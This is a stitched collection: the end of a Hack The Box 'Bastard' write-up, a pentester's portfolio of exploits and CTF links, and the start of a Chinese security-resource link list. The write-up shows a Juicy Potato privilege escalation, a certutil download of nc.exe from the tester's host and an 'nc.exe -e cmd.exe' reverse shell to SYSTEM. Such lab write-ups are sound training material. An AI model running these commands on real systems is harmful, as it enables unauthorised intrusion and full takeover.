C:\inetpub\drupal-7.54> .\JuicyPotato.exe -l 1337 -c "{C49E32C6-BC8B-11d2-85D4-00105A1F8304}" -p c:\windows\system32\cmd.exe -a "/c whoami" -t * Testing {C49E32C6-BC8B-11d2-85D4-00105A1F8304} 1337 .... [+] authresult 0 {C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK ``` It worked! - **Transfer netcat executable (64-bit) to the target machine:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|17:29:30(HKT)] └> file /opt/static-binaries/binaries/windows/x64/nc.exe /opt/static-binaries/binaries/windows/x64/nc.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, 7 sections ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|17:29:35(HKT)] └> python3 -m http.server -d /opt/static-binaries/binaries/windows/x64/ 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` ```shell PS C:\inetpub\drupal-7.54> certutil -urlcache -split -f http://10.10.14.15/nc.exe ``` - **Run the "Juicy Potato" exploit with reverse shell payload with netcat:** ```shell .\JuicyPotato.exe -l 1337 -c "{C49E32C6-BC8B-11d2-85D4-00105A1F8304}" -p c:\windows\system32\cmd.exe -a "/c C:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.10.14.15 53" -t * ``` - **Profit:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|17:23:44(HKT)] └> rlwrap -cAr nc -lvnp 53 listening on [any] 53 ... connect to [10.10.14.15] from (UNKNOWN) [10.10.10.9] 49655 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami && ipconfig /all whoami && ipconfig /all nt authority\system Windows IP Configuration Host Name . . . . . . . . . . . . : Bastard Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection Physical Address. . . . . . . . . : 00-50-56-B9-AF-84 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes IPv4 Address. . . . . . . . . . . : 10.10.10.9(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.10.10.2 DNS Servers . . . . . . . . . . . : 10.10.10.2 NetBIOS over Tcpip. . . . . . . . : Enabled [...] ``` I'm `NT AUTHORITY\SYSTEM`! :D ## Rooted **root.txt:** ```shell C:\Users\Administrator\Desktop>type root.txt {Redacted} ``` ![](https://github.com/siunam321/CTF-Writeups/blob/main/HackTheBox/Bastard/images/Pasted%20image%2020230728173418.png) ## Conclusion What we've learned: 1. Content Discovery Via `gobuster` 2. Exploiting Drupal 7.x Module Services Remote Code Execution 3. Vertical Privilege Escalation Via Abusing `SeImpersonatePrivilege` Using Juicy Potato
# Emilio Jose Iglesias Valera ## **Writeups HTB, THM, VulnHub and others...** ## **$ WHOAMI** ## **Herramientas** ----- ## **Exploits** |**Software**|**CVE**|**Link**| | :-: | :-: | :-: | |WordPress 5.7 - ‘Media Library’ XML External Entity Injection (XXE) (Authenticated)|CVE-2021-29447|[Link](https://www.exploit-db.com/exploits/50304)| |SUDO|CVE-2021-3156 (Checker)|[Link](https://github.com/m3n0sd0n4ld/CVE-Exploits/tree/main/CVE-2021-3156)| |Strapi < 3.0.0-beta.17.7 (Authenticated)|CVE-2019-19609|[Link](https://www.exploit-db.com/exploits/50238)| |Simple Image Gallery System 1.0 - SQL Injection (Time-Based blind)|n/a|[Link](https://github.com/m3n0sd0n4ld/CVE-Exploits/blob/main/Simple%20Image%20Gallery%20System/index.md)| |Company’s Recruitment Management System 1.0 - Remote Readable Administrator Credentials (Unauthenticated)|n/a|[Link](https://m3n0sd0n4ld.github.io/articles/Company-Recruitment-Management-System_1.0_Remote_Readable_Administrator_Credentials%20\(Unauthenticated\)/)| ----- ## **Writeups** ![](Aspose.Words.b2257837-6c65-4b58-9515-5fef44f47e57.001.png) |**Name**|**Level**|**OS**|**Tags**| | :- | :-: | :-: | :-: | |[Resolute](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/Resolute%20-%20hackthebox.pdf)|Medium|Windows|#smb #evil-winrm #password-spray| |[Monteverde](https://www.hackingarticles.in/hack-the-box-monteverde-walkthrough)|Medium|Windows|#enum4linux #powershell #AzureAD| |[Sauna](https://www.hackingarticles.in/hackthebox-sauna-walkthrough/)|Easy|Windows|#GetNPUsers #mimikatz #winPEAS| |[Conceal](https://www.hackingarticles.in/conceal-hackthebox-walkthrough/)|Hard|Windows|#snmp #ike-scan #strongswan| |[Omni](https://www.hackingarticles.in/omni-hackthebox-walkthrough/)|Easy|Windows|#IoT #SirepRAT.py #WDP| |[Mango](https://www.hackingarticles.in/mango-hackthebox-walkthrough/)|Medium|Linux|#NoSQL #script #SUID #jjs #java| |[Bastard](https://www.hackingarticles.in/bastard-hackthebox-walkthrough/)|Medium|Windows|#Drupal #RCE| |[Forest](https://www.hackingarticles.in/forest-hackthebox-walkthrough/)|Easy|Windows|#Exchange #Secretsdump| |[Doctor](https://www.hackingarticles.in/doctor-hackthebox-walkthrough/)|Easy|Linux|#SSTI #RCE #Splunk| |[Chaos](https://www.hackingarticles.in/chaos-hackthebox-walkthrough/)|Medium|Linux|#WP #Roundcube #Firefox| |[Armageddon](https://m3n0sd0n4ld.github.io/htb/Armageddon/)|Easy|Linux|#Drupal #Snap| |[Knife](https://m3n0sd0n4ld.github.io/htb/Knife/)|Easy|Linux|#PHP8 #RCE #Knife| |[BountyHunter](https://m3n0sd0n4ld.github.io/htb/BountyHunter/)|Easy|Linux|#XXE #RCE #MDFiles| |Explore (**private**)|Easy|Android|—| |Previse (**private**)|Easy|Linux|—| |[Driver](https://m3n0sd0n4ld.github.io/htb/Driver/)|Easy|Windows|#Drivers #MFP #RCE| |[Bolt](https://m3n0sd0n4ld.github.io/htb/Bolt/)|Medium|Linux|#Passbolt #AdminLTE3 #GPG| |[Secret](https://m3n0sd0n4ld.github.io/htb/Secret/)|Easy|Linux|#JWT #Cmd-Injection| |[Shibboleth](https://m3n0sd0n4ld.github.io/htb/Shibboleth/)|Medium|Linux|#IPMI #Zabbix #MariaDB | |[Paper](https://m3n0sd0n4ld.github.io/htb/Paper/)|Easy|Linux|WordPress #rocketchat #Polkit| |[Timelapse (**private**)](https://m3n0sd0n4ld.github.io/htb/Timelapse/)|Easy|Windows|—| |[Pandora](https://m3n0sd0n4ld.github.io/htb/Pandora/)|Easy|Linux|#SNMP #PandoraFMS #PathHijacking| |[Unicode](https://m3n0sd0n4ld.github.io/htb/Unicode/)|Medium|Linux|#JWT #RSA #ByPass #cURL| |[RouterSpace](https://m3n0sd0n4ld.github.io/htb/RouterSpace/)|Easy|Linux|#apk #anbox #cmdinjection #SUDO| |[Meta](https://m3n0sd0n4ld.github.io/htb/Meta/)|Medium|Linux|#Exiftool #RCE #Mogrify #ImageMagick #Neofetch| |[Undetected](https://m3n0sd0n4ld.github.io/htb/Undetected/)|Medium|Linux|#PHPUnit #RCE #XOR #Reversing| |[Timing](https://m3n0sd0n4ld.github.io/htb/Timing/)|Medium|Linux|#PHPWrappers #PHPTime #Git| |[AdmirerToo](https://m3n0sd0n4ld.github.io/htb/AdmirerToo/)|Hard|Linux|#Adminer #SSRF #OpenTSDB #OpenCATS #Fail2Ban| |[Catch](https://m3n0sd0n4ld.github.io/htb/Catch/)|Medium|Linux|#APK #Cachet #SQLi #jarsigner| |[Noter (**private**)](https://m3n0sd0n4ld.github.io/htb/Noter/)|Medium|Linux|—| |[Acute](https://m3n0sd0n4ld.github.io/htb/Acute/)|Hard|Windows|#PowershellWeb #AV #Invoke-Command| |[Phoenix](https://m3n0sd0n4ld.github.io/htb/Phoenix/)|Hard|Linux|#WP #plugins #google-authenticator #rsync| |[OpenSource (**private**)](https://m3n0sd0n4ld.github.io/htb/OpenSource/)|Easy|Linux|—| |[Trick (**private**)](https://m3n0sd0n4ld.github.io/htb/Trick/)|Easy|Linux|—| |[Faculty (**private**)](https://m3n0sd0n4ld.github.io/htb/Faculty/)|Medium|Linux|—| |[Late](https://m3n0sd0n4ld.github.io/htb/Late/)|Easy|Linux|#SSTI #Jinja2 #misconfiguration| |[RedPanda (**private**)](https://m3n0sd0n4ld.github.io/htb/RedPanda/)|Easy|Linux|—| |[StreamIO (**private**)](https://m3n0sd0n4ld.github.io/htb/StreamIO/)|Medium|Windows|—| |[Talkative](https://m3n0sd0n4ld.github.io/htb/Talkative/)|Hard|Linux|#rocketchat #jamovi #boltcms #mongodb #cap-dac-read-search| |[Support (**private**)](https://m3n0sd0n4ld.github.io/htb/Support/)|Easy|Windows|—| |[Shared (**private**)](https://m3n0sd0n4ld.github.io/htb/Shared/)|Medium|Linux|—| ![](Aspose.Words.b2257837-6c65-4b58-9515-5fef44f47e57.001.png) |**Name**|**Level**|**OS**|**Tags**| | :- | :-: | :-: | :-: | |[Relevant](https://www.hackingarticles.in/relevant-tryhackme-walkthrough/)|Medium|Windows|#smb #cmdasp| |[Startup](https://www.hackingarticles.in/startup-tryhackme-walkthrough/)|Easy|Linux|#wireshark #cron #gobuster| |[Internal](https://www.hackingarticles.in/internal-tryhackme-walkthrough/)|Hard|Linux|#WP #Jenkins| |[Revenge](https://www.hackingarticles.in/revenge-tryhackme-walkthrough)|Medium|Linux|#sqlmap #sudo #systemctl| |[0day](https://www.hackingarticles.in/0day-tryhackme-walkthrough)|Medium|Linux|#shellshock #overlays| |[Ghizer](https://www.hackingarticles.in/ghizer-tryhackme-walkthrough)|Medium|Linux|#debug #RCE #Limesurvey #ghidra| |[Iron Corp](https://www.hackingarticles.in/iron-corp-tryhackme-walkthrough)|Hard|Windows|#hydra #dig #SSRF #ACL| |[Bookstore](https://m3n0sd0n4ld.github.io/thm/Bookstore)|Medium|Linux|#rest #api #python #SUID| |[USTOUN](https://m3n0sd0n4ld.github.io/thm/USTOUN/)|Medium|Windows|#AD #RID #crackmapexec #mssqlclient| |[GoldenEye](https://m3n0sd0n4ld.github.io/thm/GoldenEye/)|Medium|Linux|#hydra #telnet #pop3 #aspell #overlays| |[Lunizz CTF (Patched)](https://m3n0sd0n4ld.github.io/thm/LunizzCTF/)|Medium|Linux|#Cmd-inject #mysql #bcrypt #cipher| |[Cat Pictures](https://m3n0sd0n4ld.github.io/thm/CatPictures/)|Easy|Linux|#phpbb #docker #cron| |[Wgel CTF](https://m3n0sd0n4ld.github.io/thm/WgelCTF/)|Easy|Linux|#wget #passwd #SUDO| |[Jack-of-All-Trades](https://m3n0sd0n4ld.github.io/thm/Jack-of-All-Trades/)|Easy|Linux|#crypto #stego #strings| |[VulnNet: dotjar](https://m3n0sd0n4ld.github.io/thm/VulnNet-dotjar/)|Medium|Linux|#ghostcat #war #tomcat #SUDO #jar| |[KoTH Food CTF](https://m3n0sd0n4ld.github.io/thm/KoTH-Food-CTF/)|Easy|Linux|#mysql #SETUID #screen| |[KoTH Hackers](https://m3n0sd0n4ld.github.io/thm/KoTH-Hackers/)|Medium|Linux|#ssh #privatekeys #SUDO #nano| |[The Blob Blog](https://m3n0sd0n4ld.github.io/thm/The-Blob-Blog/)|Medium|Linux|#brainfuck #steghide #reversing| |[Mustacchio](https://m3n0sd0n4ld.github.io/thm/Mustacchio/)|Easy|Linux|#XXE #pathabsolute #tail| |[Harder](https://m3n0sd0n4ld.github.io/thm/Harder/)|Medium|Linux|#git #alpine #gpg| |[Fusion Corp](https://m3n0sd0n4ld.github.io/thm/Fusion-Corp/)|Hard|Windows|#kerbrute #ASReproast #LDAP #AD| |[EnterPrize](https://m3n0sd0n4ld.github.io/thm/EnterPrize/)|Hard|Linux|#typo3 #libcustom.so #norootsquash| |[Mnemonic](https://m3n0sd0n4ld.github.io/thm/Mnemonic/)|Medium|Linux|#cracking #python #script| |[Undiscovered](https://m3n0sd0n4ld.github.io/thm/Undiscovered/)|Medium|Linux|#riteCMS #RCE #norootsquash| |[Couch](https://m3n0sd0n4ld.github.io/thm/Couch/)|Easy|Linux|#CouchDB #docker| |[Empline](https://m3n0sd0n4ld.github.io/thm/Empline/)|Medium|Linux|#opencats #XXE #capabilities #ruby| |[IDE](https://m3n0sd0n4ld.github.io/thm/IDE/)|Easy|Linux|#Codiad #RCE #services| |[Zeno](https://m3n0sd0n4ld.github.io/thm/zeno/)|Medium|Linux|#Restaurant #SQLi #RCE #services #reboot| |[Minotaur’s Labyrinth](https://m3n0sd0n4ld.github.io/thm/Minotaurs-Labyrinth/)|Medium|Linux|#API #SQLi #Time-based #Cmd-Injection| |[Lumberjack Turtle](https://m3n0sd0n4ld.github.io/thm/Lumberjack-Turtle/)|Medium|Linux|#Log4j #Nagios #NSCA #Escape-Docker| |[Flatline](https://m3n0sd0n4ld.github.io/thm/Flatline/)|Easy|Windows|#FreeSWITCH #OpenClinic| |[Oh My WebServer](https://m3n0sd0n4ld.github.io/thm/Oh-My-WebServer/)|Medium|Linux|#Apache #CVE-2021-41773 #OMIGOD| |[Aratus](https://m3n0sd0n4ld.github.io/thm/Aratus/)|Medium|Linux|#tcpdump #capabilities #ansible| |[Ollie](https://m3n0sd0n4ld.github.io/thm/Ollie/)|Medium|Linux|#phpIPAM #sqli| |[Plotted-LMS](https://m3n0sd0n4ld.github.io/thm/Plotted-LMS/)|Hard|Linux|#Moodle #RCE #Logrotate| ![](Aspose.Words.b2257837-6c65-4b58-9515-5fef44f47e57.001.png) |**Name**|**Level**|**OS**|**Tags**| | :- | :-: | :-: | :-: | |[VulnUni](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/VulnUni%20-%20vulnhub.pdf)|Medium|Linux|#eClass #SQLi #DirtyCow| |[Recon:1](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/Recon-1%20-%20vulnhub.pdf)|Easy|Linux|#WP #SUDO #gdb| |[CK-00](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/CK-00%20-%20vulnhub.pdf)|Easy|Linux|#WP #SUDO #scp| |[DevRandom CTF: 1.1](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/DevRandom%20CTF%201.1-%20vulnhub.pdf)|Easy|Linux|#LFI #RCE #apache #poison #SUDO #dpkg| |[Victim: 1](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/Victim-1%20-%20vulnhub.pdf)|Medium|Linux|#Bolt #WebFS #wpa #wifi #SUID #nohup| |[Zion: 1](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/Zion-1%20-%20vulnhub.pdf)|Medium|Linux|#SSH #SUDO #cp| |[Death Star: 1](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/Death%20Star-1%20-%20vulnhub.pdf)|Medium|Linux|#UDP #steghide #knockport #lib.so.6| |[Tre: 1](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/Tre-1%20-%20vulnhub.pdf)|Medium|Linux|#adminer #mantisBT #SUDO #shutdown| |[Seppuku: 1](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/Seppuku-1%20-%20vulnhub.pdf)|Hard|Linux|#webconsole #smb #SUDO #ln| |[CengBox: 2](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/CengBox-2%20-%20vulnhub.pdf)|Medium|Linux|#GilaCMS #SUDO #scripts| |[HA: Natraj](https://www.hackingarticles.in/ha-natraj-vulnhub-walkthrough/)|Medium|Linux|#LFI #SSH #RCE #poison #SUDO #nmap| |[Glasgow Smile: 1.1](https://www.hackingarticles.in/glasgow-smile-1-1-vulnhub-walkthrough/)|Medium|Linux|#joomla #cron| |[GitRoot: 1](https://www.hackingarticles.in/gitroot-1-vulnhub-walkthrough/)|Medium|Linux|#git #SUDO| |[eLection: 1](https://www.hackingarticles.in/election-1-vulnhub-walkthorugh/)|Medium|Linux|#eLection #OSINT #SQLi #| |[Sunset: decoy](https://www.hackingarticles.in/sunset-decoy-vulnhub-walkthrough/)|Easy|Linux|#zip #john #chkrootkit| |[CyberSploit: 1](https://www.hackingarticles.in/cybersploit-1-vulnhub-walkthrough/)|Easy|Linux|#crypto #overlays| |[Pwned: 1](https://www.hackingarticles.in/pwned-1-vulnhub-walkthorugh/)|Easy|Linux|#SSH #group #docker| |[BlackRose: 1](https://www.hackingarticles.in/blackrose-1-vulnhub-walkthrough/)|Hard|Linux|#byPass #PHP #strcmp #id.so #reversing #ghidra #waf| |[GreenOptic: 1](https://www.hackingarticles.in/greenoptic-1-vulnhub-walkthrough/)|Hard|Linux|#LFI #wireshark #group| |[Presidential: 1](https://www.hackingarticles.in/presidential-1-vulnhub-walkthrough/)|Hard|Linux|#LFI #RCE #phpmyadmin #capabilities #tar| |[Tomato: 1](https://www.hackingarticles.in/tomato-1-vulnhub-walkthrough/)|Medium|Linux|#LFI #poison #RCE #ssh #log #CVE-2017-16995| |[Sunset: Midninght](https://www.hackingarticles.in/sunset-midnight-vulnhub-walkthrough/)|Medium|Linux|#WP #SUID #status #path #service| |[Sunset: Twilight](https://www.hackingarticles.in/sunset-twilight-vulnhub-walkthrough/)|Medium|Linux|#PHPF1 #shadow #file| |[Chili: 1](https://www.hackingarticles.in/chili-1-vulnhub-walkthrough/)|Easy|Linux|#FTP #write #abuse #passwd| |[Cewlkid: 1](https://www.hackingarticles.in/cewlkid-1-vulnhub-walkthrough/)|Medium|Linux|#SitemagicCMS #fileupload #cron #SUDO| |[Durian: 1](https://www.hackingarticles.in/durian-1-vulnhub-walkthrough/)|Hard|Linux|#LFI #RCE #log #poison #capabilities #gdb| |[Relevant: 1](https://www.hackingarticles.in/relevant-1-vulnhub-walkthrough/)|Medium|Linux|#WP #nmap #scripts #plugins #wp-file-manager #RCE #SUDO #node| |[Powergrid: 1.0.1](https://www.hackingarticles.in/powergrid-1-0-1-vulnhub-walkthrough/)|Hard|Linux|#Roundcube #RCE #PGP #Rsync #pivoting #SSH| |[Insanity: 1](https://www.hackingarticles.in/insanity-1-vulnhub-walkthrough/)|Hard|Linux|#wireshark #SQLi #SquirrelMail #Firefox| |[Tempus Fugit: 3](https://www.hackingarticles.in/tempus-fugit-3-vulnhub-walkthrough/)|Hard|Linux|#SSTI #SQLite #Processwire #OPT #Google #reversing #abuse #binary| |[KB-Vulns: 3](https://www.hackingarticles.in/kb-vuln-3-vulnhub-walkthrough/)|Easy|Linux|#smb #SiteMagicCMS #SETUID #systemctl| |[Cybox: 1](https://www.hackingarticles.in/cybox-1-vulnhub-walkthrough/)|Medium|Linux|#LFI #RCE #Apache #poison #SETUID #uncommon| ![](Aspose.Words.b2257837-6c65-4b58-9515-5fef44f47e57.002.png) |**Name**|**Level**|**OS**|**Tags**| | :- | :-: | :-: | :-: | |[DC5](https://m3n0sd0n4ld.github.io/OSC/DC5/)|Easy|Linux|#LFI #RCE #Nginx #log #poison #SETUID #screen| ![](Aspose.Words.b2257837-6c65-4b58-9515-5fef44f47e57.001.png) |**Name**|**Level**|**OS**|**Tags**| | :- | :-: | :-: | :-: | |[El coche fantástico](https://github.com/m3n0sd0n4ld/writeups/blob/master/pdfs/UAM%20-%20El%20coche%20fant%C3%A1stico%20-%20Episodio%201.pdf)|Easy|Linux|#web #waf #xor #RCE| ----- ## **Articulos** - [CTF: Aprende «hacking» jugando](https://www.sothis.tech/capture-the-flag-aprende-hacking-jugando/) - [Por el router muere el pez](https://www.sothis.tech/por-el-router-muere-el-pez/) - [Ciberataques físicos: cuando el peligro está en un USB](https://www.sothis.tech/sistemas-de-control-industrial/) - [Black Fraude: cómo evitar las estafas en rebajas](https://www.sothis.tech/black-fraude-como-evitar-las-estafas-en-rebajas/) - [El Coronavirus, una excusa más para los ciberdelincuentes](https://www.sothis.tech/ciberseguridad-aplicada-al-coronavirus/) - [GooFuzz: la herramienta para la enumeración de directorios y ficheros de forma pasiva](https://www.hackplayers.com/2022/06/goofuzz-tool-enum-pasiva.html) - [Company’s Recruitment Management System 1.0 - Remote Readable Administrator Credentials (Unauthenticated)](https://m3n0sd0n4ld.github.io/articles/Company-Recruitment-Management-System_1.0_Remote_Readable_Administrator_Credentials%20\(Unauthenticated\)/) ----- ## **Eventos y conferencias** ## **Sobre mi**
# Project Description Collection of quality safety articles(To be rebuilt) ``` Some are inconvenient to release. Some forget update,can see me star. collection-document awesome 以前的链接中大多不是优质的 渗透测试部分不再更新 因精力有限,缓慢更新 Author: [tom0li] Blog: https://tom0li.github.io ``` - [Project Description](#project-description) - [Github-list](#github-list) - [Awesome-list](#awesome-list) - [开发](#开发) - [其它](#其它) - [安全](#安全) - [安全list](#安全list) - [安全市场洞察](#安全市场洞察) - [云安全](#云安全) - [云基础知识](#云基础知识) - [云原生安全](#云原生安全) - [云上攻防](#云上攻防) - [VM](#vm) - [vCenter](#vcenter) - [SLP](#slp) - [AI安全](#ai安全) - [新安全方案](#新安全方案) - [构建下一代安全](#构建下一代安全) - [零信任](#零信任) - [DevSecOps](#devsecops) - [威胁检测](#威胁检测) - [RASP](#rasp) - [HIDS](#hids) - [WAF](#waf) - [WAF建设指南](#waf建设指南) - [BypassWAF](#bypasswaf) - [Webshell检测](#webshell检测) - [反弹Shell检测](#反弹shell检测) - [EDR](#edr) - [AV](#av) - [横向移动检测-蜜罐思路](#横向移动检测-蜜罐思路) - [恶意流量检测](#恶意流量检测) - [IDS](#ids) - [文本检测](#文本检测) - [安全运营](#安全运营) - [数据安全](#数据安全) - [网络测绘](#网络测绘) - [通信安全](#通信安全) - [端对端通信(初版)](#端对端通信初版) - [SNI](#sni) - [个人安全](#个人安全) - [APT研究](#apt研究) - [高级威胁-list](#高级威胁-list) - [威胁情报](#威胁情报) - [钓鱼](#钓鱼) - [C2-RAT](#c2-rat) - [预警&研究](#预警研究) - [ImageMagick](#imagemagick) - [Exchange](#exchange) - [Privilege-Escalation](#privilege-escalation) - [VPN](#vpn) - [Sangfor](#sangfor) - [Pulse](#pulse) - [Palo](#palo) - [Fortigate](#fortigate) - [Citrix Gateway/ADC](#citrix-gatewayadc) - [Tomcat](#tomcat) - [FUZZING](#fuzzing) - [代码审计-JAVA](#代码审计-java) - [反序列化-其他](#反序列化-其他) - [RMI](#rmi) - [Shiro](#shiro) - [Fastjson](#fastjson) - [Dubbo](#dubbo) - [CAS](#cas) - [Solr模版注入](#solr模版注入) - [Apache Skywalking](#apache-skywalking) - [Spring](#spring) - [Spring-boot](#spring-boot) - [Spring-cloud](#spring-cloud) - [Spring-data](#spring-data) - [区块链](#区块链) - [渗透](#渗透) - [边界渗透](#边界渗透) - [渗透记录和总结](#渗透记录和总结) - [信息收集](#信息收集) - [靶场](#靶场) - [渗透技巧](#渗透技巧) - [内网渗透](#内网渗透) - [Exchange利用(旧)](#exchange利用旧) - [hash ticket Credential](#hash-ticket-credential) - [代理转发与端口复用](#代理转发与端口复用) - [内网平台](#内网平台) - [内网技巧](#内网技巧) - [提权利用](#提权利用) - [Bug_Bounty](#bug_bounty) - [Web](#web) - [XXE](#xxe) - [XSS](#xss) - [Jsonp](#jsonp) - [CORS](#cors) - [CSRF](#csrf) - [SSRF](#ssrf) - [SQL](#sql) - [文件包含](#文件包含) - [上传](#上传) - [任意文件读取](#任意文件读取) - [Web缓存欺骗](#web缓存欺骗) - [Web缓存投毒](#web缓存投毒) - [SSI](#ssi) - [SSTI](#ssti) - [JS](#js) - [DNS](#dns) - [其他](#其他) - [Git](#git) - [二维码](#二维码) - [爬虫](#爬虫) - [效率](#效率) - [科普](#科普) - [Contribute](#contribute) - [Acknowledgments](#acknowledgments) - [Star](#star) ## Github-list ### Awesome-list * [awesome-web-security](https://github.com/qazbnm456/awesome-web-security) * [Awesome-Hacking](https://github.com/Hack-with-Github/Awesome-Hacking) - 万星list * [awesome-malware-analysis](https://github.com/rshipp/awesome-malware-analysis) * [Android Security](https://github.com/ashishb/android-security-awesome) - Collection of Android security related resources. * [Security](https://github.com/sbilly/awesome-security) - Software, libraries, documents, and other resources. * [An Information Security Reference That Doesn't Suck](https://github.com/rmusser01/Infosec_Reference) * [Security Talks](https://github.com/PaulSec/awesome-sec-talks) - Curated list of security conferences. * [OSINT](https://github.com/jivoi/awesome-osint) - Awesome OSINT list containing great resources. * [The toolbox of open source scanners](https://github.com/We5ter/Scanners-Box) - The toolbox of open source scanners * [blackhat-arsenal-tools](https://github.com/toolswatch/blackhat-arsenal-tools) - Official Black Hat Arsenal Security Tools Repository * [awesome-iot-hacks](https://github.com/nebgnahz/awesome-iot-hacks) * [awesome-awesome](https://github.com/emijrp/awesome-awesome) * [Curated list of awesome lists](https://github.com/sindresorhus/awesome) * [Awesome Awesomness](https://github.com/bayandin/awesome-awesomeness) - The List of the Lists. * [PENTESTING-BIBLE](https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE) - 安全相关的内容 * [Web-Security-Learning](https://github.com/CHYbeta/Web-Security-Learning) - by CHYbeta * [Software-Security-Learning](https://github.com/CHYbeta/Software-Security-Learning) - by CHYbeta * [MiscSecNotes](https://github.com/JnuSimba/MiscSecNotes) - by JnuSimba notes * [AndroidSecNotes](https://github.com/JnuSimba/AndroidSecNotes) - notes * [LinuxSecNotes](https://github.com/JnuSimba/LinuxSecNotes) - notes * [resource collection of python security and code review](https://github.com/bit4woo/python_sec) * [Pentest_Interview](https://github.com/Leezj9671/Pentest_Interview) * [tanjiti 信息源](https://github.com/tanjiti/sec_profile) - by 百度tanjiti 每天爬取的安全信息源 * [CVE-Flow](https://github.com/404notf0und/CVE-Flow) - by 404notfound 监控CVE增量更新、基于深度学习的CVE EXP预测和自动化推送 * [security_w1k1](https://github.com/euphrat1ca/security_w1k1/) euphrat1ca师傅时时刻刻更新和安全相关的仓库 ### 开发 * [互联网 Java 工程师进阶知识完全扫盲](https://github.com/doocs/advanced-java) * [Java学习+面试指南 一份涵盖大部分Java程序员所需要掌握的核心知识](https://github.com/Snailclimb/JavaGuide) * [Python Cheat Sheet ](https://github.com/crazyguitar/pysheeet) * [A collection of full-stack resources for programmers.](https://github.com/charlax/professional-programming) * [web, 前端, javascript, nodejs, electron, babel, webpack, rollup, react, vue ...](https://github.com/senntyou/blogs) * [关于Python的面试题](https://github.com/taizilongxu/interview_python) * [Python-100-Days](https://github.com/jackfrued/Python-100-Days) * [python3-source-code-analysis](https://github.com/flaggo/python3-source-code-analysis) * [Coding Interview University](https://github.com/jwasham/coding-interview-university) * [tech-interview-handbook](https://github.com/yangshun/tech-interview-handbook) - good * [面试必备基础知识](https://github.com/CyC2018/CS-Notes) * [CS基础](https://github.com/selfboot/CS_Offer/) * [算法/深度学习/NLP面试笔记](https://github.com/imhuay/Algorithm_Interview_Notes-Chinese) * [算法手记](https://github.com/labuladong/fucking-algorithm) * [数据结构和算法必知必会的50个代码实现](https://github.com/wangzheng0822/algo) * [interview_internal_reference](https://github.com/0voice/interview_internal_reference) * [reverse-interview](https://github.com/yifeikong/reverse-interview-zh) - 技术面试最后反问面试官的话 ### 其它 * [信息安全从业者书单推荐](https://github.com/riusksk/secbook) * [专为程序员编写的英语学习指南 v1.2](https://github.com/yujiangshui/A-Programmers-Guide-to-English) * [中国程序员容易发音错误的单词](https://github.com/shimohq/chinese-programmer-wrong-pronunciation) * [对开发人员有用的定律、理论、原则和模式](https://github.com/nusr/hacker-laws-zh) * [SecLists](https://github.com/danielmiessler/SecLists) - Collection of multiple types of lists used during security assessments. * [A collection of web attack payloads](https://github.com/foospidy/payloads) payloads集 * [安全相关思维导图整理收集](https://github.com/phith0n/Mind-Map) - by p牛 * [安全思维导图集合](https://github.com/SecWiki/sec-chart) -by SecWiki * [Android-Reports-and-Resources](https://github.com/B3nac/Android-Reports-and-Resources) - HackerOne Reports * [AppSec](https://github.com/paragonie/awesome-appsec) - Resources for learning about application security. * [Infosec](https://github.com/onlurking/awesome-infosec) - Information security resources for pentesting, forensics, and more. * [YARA](https://github.com/InQuest/awesome-yara) - YARA rules, tools, and people. * [macOS-Security-and-Privacy-Guide](https://github.com/drduh/macOS-Security-and-Privacy-Guide) * [awesome-security-weixin-official-accounts](https://github.com/DropsOfZut/awesome-security-weixin-official-accounts) * [2018-2020青年安全圈-活跃技术博主/博客](https://github.com/404notf0und/Security-Data-Analysis-and-Visualization) - by 404notf0und * [996.Leave](https://github.com/623637646/996.Leave) * [租房要点,适用于北上广深杭](https://github.com/soulteary/tenant-point) * [北京买房](https://github.com/facert/beijing_house_knowledge) * [北京买房图鉴](https://github.com/yangyiRunning/Beijing-House) * [上海买房](https://github.com/ayuer/shanghai_house_knowledge) * [杭州买房](https://github.com/houshanren/hangzhou_house_knowledge) * [awesome-macOS](https://github.com/iCHAIT/awesome-macOS) - mac软件 * [awesome-mac](https://github.com/jaywcjlove/awesome-mac/blob/master/README-zh.md#%E5%BC%80%E5%8F%91%E8%80%85%E5%B7%A5%E5%85%B7) - mac软件 * [ruanyf](https://github.com/ruanyf/weekly) - 科技爱好者周刊 ## 安全 ### 安全list * [arxiv.org](https://arxiv.org/) 论文库 * [404notf0und学习记录](https://github.com/404notf0und/Always-Learning#APT%E6%A3%80%E6%B5%8B) 关注安全检测部分 * [Donot师傅收集的入侵检测相关的内容](https://github.com/donot-wong/SecAcademic) * [郑瀚-Blog](https://www.cnblogs.com/littlehann/) 遍历看 * [cdxy-Blog](https://www.cdxy.me/) 太帅 * [zuozuovera-Blog](https://www.zuozuovera.com/) 心灵手巧 * [安全学术圈2018年度总结](https://mp.weixin.qq.com/s/eQ5os0Fdb498BoQLKUDmrA) - 微信号安全学术圈 * 